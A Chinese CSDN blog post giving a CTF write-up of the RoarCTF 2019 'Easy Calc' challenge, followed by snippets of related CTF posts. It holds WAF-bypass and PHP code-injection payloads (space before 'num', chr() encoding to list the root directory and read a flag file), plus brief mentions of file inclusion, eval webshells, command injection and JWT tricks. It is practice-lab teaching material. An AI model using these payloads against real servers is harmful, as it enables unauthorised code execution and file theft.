CTF第二天

最新推荐文章于 2024-09-18 17:31:57 发布
最新推荐文章于 2024-09-18 17:31:57 发布
阅读量192 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52680097/article/details/117262949
版权

[RoarCTF 2019]Easy Calc 1

进去后是一个计算器,查看源码,发现了一个路径calc.php
在这里插入图片描述

进去calc.php看看,有一串代码
在这里插入图片描述
再看看calc.php?num=7*7,是可以计算结果的
在这里插入图片描述
但是参数不是数字就不行
在这里插入图片描述
WAF的问题:WAF不允许num传入字母,那我们可以在num前加个空格来绕过WAF
这里利用PHP的字符串解析特性来绕过WAF,如

calc.php? num=phpinfo();

参考
在这里插入图片描述
扫根目录下的所有文件,也就是scandir("/")
但是/被过滤了,于是用chr(47)绕过
chr()的参考
payload为/calc.php? num=print_r(scandir(chr(47)))
文件在flagg路径下
在这里插入图片描述

/calc.php?%20num=print_r(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)));

file_get_contents()函数参考
在这里插入图片描述

、Ange射手
关注
专栏目录
CTF打卡第二天
weixin_60499871的博客
07-05 193
第八题:掀桌子看起来一串十六进制,马上想到转换成字符,但是不行。将两个一组,减去128,输出acsii码 ,Python脚本如图 得到如图:转战web区:第一题:view_source 点击获取在线场景,有一个网址,因为题目是要查看网页源代码,但是右键用不了,所以目的是想办法看源代码,百度查了:Ctrl+U,里面有flag 第二题:get_post打开网址,如网站上显示操作进行如图,进行get请求再利用hackbar进行post请求 得到flag如图 第三题:robots由题目提醒robots协议,立刻想到
CTF打卡第二天-BUU-Java逆向解密
qq_42602454的博客
09-27 282
解压题目文件发现是一个class文件 使用jad进行反编译,得到Reverse.java文件: 查看Reverse.java文件: // Decompiled by Jad v1.5.8g. Copyright 2001 Pavel Kouznetsov. // Jad home page: http://www.kpdus.com/jad.html // Decompiler options: packimports(3) // Source File Name: Reverse.java i.
小白的第二天ctf之旅——了解密码学
qq_45347055的博客
04-10 294
我们要学习一门学科,首先就是要了解我们主要学习什么,大概内容,要了解专业中的专业术语,所以我今天特意整理了一下密码学的部分术语, 密钥:分为加密密钥和解密密钥。 明文:没有进行加密,能够直接代表原文含义的信息。 密文:经过加密处理处理之后,隐藏原文含义的信息。 加密:将明文转换成密文的实施过程。 解密:将密文转换成明文的实施过程。 密码算法:密码系统采用的加密方法和解密方法,随着基于数学密码技术的...
每天一道CTF 第二天
scrawman的博客
03-01 824
今天这个题目很简单,但我还是做了好久。有一些payload之前试了没成功后面再试又可以了,搞得我也很疑惑,不知道自己是不是之前引号没打对还是空格没打对。 进入正题: [极客大挑战 2019]EasySQL 题目就告诉我们了是要SQL注入 在用户名和密码分别输入admin’,password,报错显示如下 admin,password’,报错显示如下 admin’,password’,报错显示如下 结合三种情况来看,username使用的是单引号,password使用的是双引号。或者再用admin'#
CTF第二天(自记)
最新发布
m0_62360849的博客
09-18 193
失败点注意数据包(这题就是一直以为是登录页面有sql注入,跑了半天啥都没,实际注入点在认真抓取数据包))以为注入点查数据库,flag在数据里面,实际题目是获取数据库里面的password,然后admin进行登录获取flag。
ctf打卡第二天
jie_a的博客
06-06 162
第一题 首先打开页面是这样的 啥也没有,扫一下目录看看 发现一个robots目录 打开目录 是一个备份文件,下载下来 里面是这样的 提示是PHP变量覆盖,我们从这下手 使用foreach来遍历数组中的值,然后再将获取到的数组键名作为变量,数组中的键值作为变量的值。因此就产生了变量覆盖漏洞 然后我传入get参数flag=flag 在用post传入flag=flag 发现没有flag 我再次尝试吧传参 这次吧get:flag=abc POST:flag=abc 我发现该出现flag的位置变成了abc,
小白学习CTF第二天-SSH服务渗透
bbhh1139的博客
04-09 422
SSH服务协议 SSH协议介绍 SSH协议认证机制 SSH协议验证机制弱点 信息探测 在基本的了解了SSH的基本内容之后,我们开始针对今天的靶场进行渗透: 信息探测的方式很多,后面跟的参数不同,导致实现的具体功能有别。在探测之前,还是要知道我们攻击机以及靶场的IP地址(具体看图,这里就不重复了)接下来我们开始简单的进行测试: 分析探测结果 探测之后我们要进行探测结果的分析。 我们发现此...
CTF第十二天
qq_52680097的博客
06-05 226
[安洵杯 2019]easy_serialize_php 前几天学了点反序列化,今天练练手 简单地说下序列化和反序列化后的格式 序列化后的结果是一串字符串。 反序列化会解开序列化的字符串生成相应类型的数据。 <?php $function = @$_GET['f'];//得到f传入的参数 //对输入的$img参数进行检验 function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g');//定义一些字符
CTF第九天
qq_52680097的博客
06-02 394
[安洵杯 2019]easy_web 1 1.打开页面,查看源码,有一个提示md5的 看看url,有个cmd,和一个img的密文 在burp上进行两次base64解密和一次ascii hex解密后得到,555.png,由此我们知道了文件的加密方法,我们将index.php进行ascii hex加密和两次base64加密后得到TmprMlpUWTBOalUzT0RKbE56QTJPRGN3 构造url/index.php?img=TmprMlpUWTBOalUzT0RKbE56QTJPRGN3&c
CTF第十四天
qq_52680097的博客
08-28 1124
CTF第十四天 太久没写了,今天挑战下题目 LD_PRELOAD 太久没整了,我都忘了PHP是啥,再复习一遍。 PHP是一种能在服务器端执行的脚本语言,也可嵌入到HTML中 看到这个提示,先来了解下Linux LD_PRELOAD环境变量 这里有关于动态链接库的详解和Linux LD_PRELOAD环境变量简介 动态链接库详解【一】 linux 环境变量LD_PRELOAD简介 定义优先加载的动态链接库 了解了这些,大概就能知道这题的原理了 原理:php部分函数在执行的时候会加载动态库里面的函数,而LD_
第二十天 CTF初识
weixin_46653764的博客
06-26 771
一、记下一些不知道的小知识 (1)常见的备份文件后缀名有: .git .svn .swp .svn .~ .bak .bash_history 而 php的备份有两种:****.php~和.php.bak (2)去了解php的弱类型 (3)
CTF第四天和第五天打卡
weixin_60499871的博客
07-08 274
第一题:weak_auth打开网址如图由题目可以知道,考察弱口令知识 。常见的管理员账号:admin,root。 常见的弱密码:123456、12345678、admin、root、toor 等。个个输入一下,admin,密码123456,得到flag如图第二题:simple_php 方向打开网址,进行代码审计,以get方式获取了a,b两个值,地址后面直接加/?a=&b= 赋值传参即可,==为宽松比较(类型不同值一样返回True),=== 为严格比较(类型不同即使值一样也返回False)当字符串和数值比较时
CTF打卡第三天
weixin_60499871的博客
07-07 129
第一题:backup打开网址如图:常见的备份文件后缀名有: 然后用记事本打开如图 :第二题:cookie 打开网址如图:这里加一些cookie知识: Cookie是当主机访问Web服务器时,由 Web 服务器创建的,将信息存储在用户计算机上的文件。一般网络用户习惯用其复数形式 Cookies,指某些网站为了辨别用户身份、进行 Session 跟踪而存储在用户本地终端上的数据,而这些数据通常会经过加密处理。然后 Fn+F12,在console上输入document.cookie如图然后在URL后加上/cook
CTF-简单的加密解密
热门推荐
qq_52680097的博客
05-17 1万+
CTF-简单的加密解密 最近遇上了一到ctf的比赛题,所以记录下来。 1.下载附件 2.打开后发现是验证flag值的一个程序,猜想要用反编译的软件,Easy Python Decompiler获取源码 3.分析代码 # Embedded file name: 2.py import base64 def encode(yourflag): #对输入的flag进行加密 s = '' #将输入的flag拆成单个的字符 fo
CTF第十五天
qq_52680097的博客
08-29 536
JSON Web Token 关于JWT,下面是一些资料 添加链接描述 添加链接描述 简单来说,就是身份验证的payload 敏感信息泄露 1.随便登录一个账号后再网页工具的“网络”查看token 2.解密 添加链接描述 3.将上面和下面拼成flag值就行 无签名 1.在pycharm中加入pyjwt库,下面是安装教程 添加链接描述 2.运行以下脚本 import jwt payload={ "username": "admin", "password": "admin", "role":
CTF第三天
qq_52680097的博客
05-26 495
[极客大挑战 2019]Knife 1 进去以后,看到这个页面,猜想要用蚁剑 例 //eval — 把字符串bai作为PHP代码执行 eval('echo 123;');//输出123 eval($_POST["Syc"]);//上传一个字符串Sys 打开蚁剑,添加URL,密码为Sys 连接后在根目录找到flag [GXYCT [GXYCTF2019]Ping Ping Ping 1 进去后看到这个一个查询ip的格式,我们可以用这个来输入命令 首先输入/?ip=127.0.0.1|ls,发现了
CTF第八天
qq_52680097的博客
06-01 490
[BSidesCF 2020]Had a bad day 1 可能存在SQL注入或者文件包含,试试用filter伪协议读取index.php文件 /index.php?category=php://filter/read=convert.base64-encode/resource=index.php 报错了 的确是文件包含,但是有index.php却读取错误,报错显示无法打开流:操作失败,结果把.php后缀去掉,可以读取 /index.php?category=php://filter/read=c
CTF
qq_52680097的博客
05-24 396
[ACTF2020 新生赛]Include1 打开网页,点击tips,跳转到了另一个地址,观察了下网址,有一个文件包含 /?file=php://filter/read=convert.base64-encode/resource=flag.php 用base64解码 1.格式 2.打开方式,也就是读(read)或写(write) 3.是过滤器。主要有四种:字符串过滤器,转换过滤器,压缩过滤器,加密过滤器。filter里可以用一或多个过滤器(中间用|隔开),这也为解题提供了多种方法,灵活运用过滤器
CTF第十天
qq_52680097的博客
06-03 254
MD5 1 下载文件得到密文e00cf25ad42683b3df678c61f42c6bda 拿去md5解密,写成flag{admin1}即可 Url编码 1 下载密文,放在burp中url解码就行 一眼就解密 看到密文最后有个等号,猜想是base64解码,试试看 看我回旋踢 密文synt{5pq1004q-86n5-46q8-o720-oro5on0417r1} 猜出前面那个肯定是flag这个单词,列个字母表数数看,发现果然都偏移了13位,是凯撒加密 摩丝 文件里有一段摩斯密码,解密 解密网站
CTF二进制学习路线
07-27
CTF二进制学习路线可以按照以下步骤进行: 1. 入门逆向工具:首先,你可以学习一些逆向工具,比如IDA Pro和Ghidra。这些工具可以帮助你分析和理解二进制文件的结构和功能。\[2\] 2. 学习数据结构和算法:在进行CTF...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值